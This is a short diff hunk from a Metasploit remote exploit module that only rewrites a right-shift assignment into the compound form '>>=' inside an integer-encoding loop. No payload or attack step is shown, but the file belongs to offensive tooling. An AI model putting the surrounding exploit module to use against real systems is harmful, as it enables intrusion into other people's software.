@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
           break
         else
           pack_array.prepend((current_number >> 7) | 0x80)
-          current_number = current_number >> 7
+          current_number >>= 7
         end
         count += 1
       end
